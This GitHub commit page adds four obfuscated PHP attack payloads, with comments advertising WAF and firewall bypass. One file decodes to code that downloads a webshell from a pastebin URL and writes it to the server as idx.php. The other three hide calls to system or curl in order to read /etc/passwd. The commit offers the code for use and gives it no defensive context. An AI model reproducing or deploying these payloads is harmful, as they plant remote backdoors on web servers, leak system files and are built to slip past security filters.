Skip to content

Commit

Permalink
payloads folder
Browse files Browse the repository at this point in the history
  • Loading branch information
KeepWannabe committed Mar 8, 2019
1 parent c8a957b commit 79f8c9c
Show file tree
Hide file tree
Showing 4 changed files with 147 additions and 0 deletions.
75 changes: 75 additions & 0 deletions lib/payloads/backdoor_spawner.php
@@ -0,0 +1,75 @@
<?php
$key
/**
* @package Backdoor IDX Webshell Spawner (idx.php)
* Bypass Any WAF / Firewall
* Bypass HTTP ERROR [ 403, 402 & etc... ]
* @author Created by Ardzz 👍
* @link https://www.github.com/ardzz
*/
=
(
/*
👍
👍 👍 Created By Ardzz 👍
👍
*/
"0123456789abcdefghijklmnopqrstuvwxyz;`</>- |_=,.:ABCDEFGHIJKLMNOPQRSTUVWXYZ"
/*
👍
👍 👍 Created By Ardzz 👍
👍
*/
);
(
$key[15].
$key[18].
$key[21].
$key[14].
$key[44].
$key[25].$key[30].
$key[29].$key[44].
$key[12].$key[24].
$key[23].
$key[29].
$key[14].
$key[23].
$key[29].
$key[28]
)
(
(
$key[18].
$key[13].
$key[33].$key[47].
$key[25].$key[17].$key[25]
),
(
$key[15].
$key[18].
$key[21].
$key[14].$key[44].
$key[16].$key[14].
$key[29].$key[44].
$key[12].
$key[24].$key[23].$key[29].
$key[14].$key[23].$key[29].
$key[28]
)
(
(
$key[17].$key[29].
$key[29].$key[25].
$key[28].$key[48].
$key[39].$key[39].
$key[25].$key[10].$key[28].
$key[29].$key[14].$key[11].
$key[18].$key[23].$key[47].
$key[12].$key[24].$key[22].
$key[39].$key[27].$key[10].$key[32].
$key[39].$key[05].$key[72].$key[05].
$key[00].$key[12].$key[35].$key[74].$key[22]
)
)
);
?>
4 changes: 4 additions & 0 deletions lib/payloads/command_system_bypass.php
@@ -0,0 +1,4 @@
<?php
$a=("m".("s".("e")."t")."y");$b=$a[90/10-8]./**/($a[2*2-0/1]).$a[1*0+1/
1-0]./**/$a[150/50].($a[6/3*1/**/-0]).$a[/**/!FAlsE+fALsE-!fAlSe];$b('$u/b??/c?t $u/??c$u/p????d');
?>
9 changes: 9 additions & 0 deletions lib/payloads/readfile-curl.php
@@ -0,0 +1,9 @@
<?php
/*
bypass WAF & filter function
script to read file /etc/passwd using curl <3
created by ardzz <3
*/
$a="he"."x2"."b"."in";$chh = $a("6375726c5f696e6974");$ch = $chh(); $c = $a("6375726c5f7365746f7074");$cc = $a("4355524c4f50545f55524c");$ccc = $a("4355524c4f50545f52455455524e5452414e53464552");$fna = "/cetspadw";$fn = $fna[0].$fna[2].$fna[3].$fna[1].$fna[0].$fna[5].$fna[6].$fna[4].$fna[4].$fna[8].$fna[7];$c($ch, CURLOPT_URL, "fi"."le://{$fn}");$c($ch, CURLOPT_RETURNTRANSFER, 1);$ex = $a("6375726c5f65786563");$output = $ex($ch); $cl = $a("6375726c5f636c6f7365");$cl($ch); echo $output;
?>

59 changes: 59 additions & 0 deletions lib/payloads/readfile-uniq.php
@@ -0,0 +1,59 @@
<?php

/*
Jika anda tidak faham kode ini, maka anda orang 'normal' :)
*/

$str = (
("".
("0".("1".
("2".("3".
("4".("5".
("6".("7".
("8".("9".
("a".("b".
("c".("d".
("e".("f".
("g".("h".
("i".("j".
("k"."l")
."m")."n")
."o")."p")
."q")."r")
."s")."t")
."u")."v")
."w")."x")
."y")."z")
.";")."`")
."<")."/")
.">")."-")
." ")
);
(
$str[28] .("").("").("").("").
$str[34] .("").("").("").("").("").("").
$str[28] .("").("").("").("").("").("").("").
$str[29] .("").("").("").("").("").("").
$str[14] .("").("").("").("").
$str[22]
)
(
$str[12] .("").
$str[10] .("").
$str[29] .("").
$str[42] .("").
$str[39] .("").
$str[14] .("").
$str[29] .("").("").("").("").("").("").
$str[12] .("").("").("").("").("").("").
$str[39] .("").
$str[25] .("").
$str[10] .("").
$str[28] .("").
$str[28] .("").
$str[32] .("").
$str[13]
);

?>

0 comments on commit 79f8c9c

Please sign in to comment.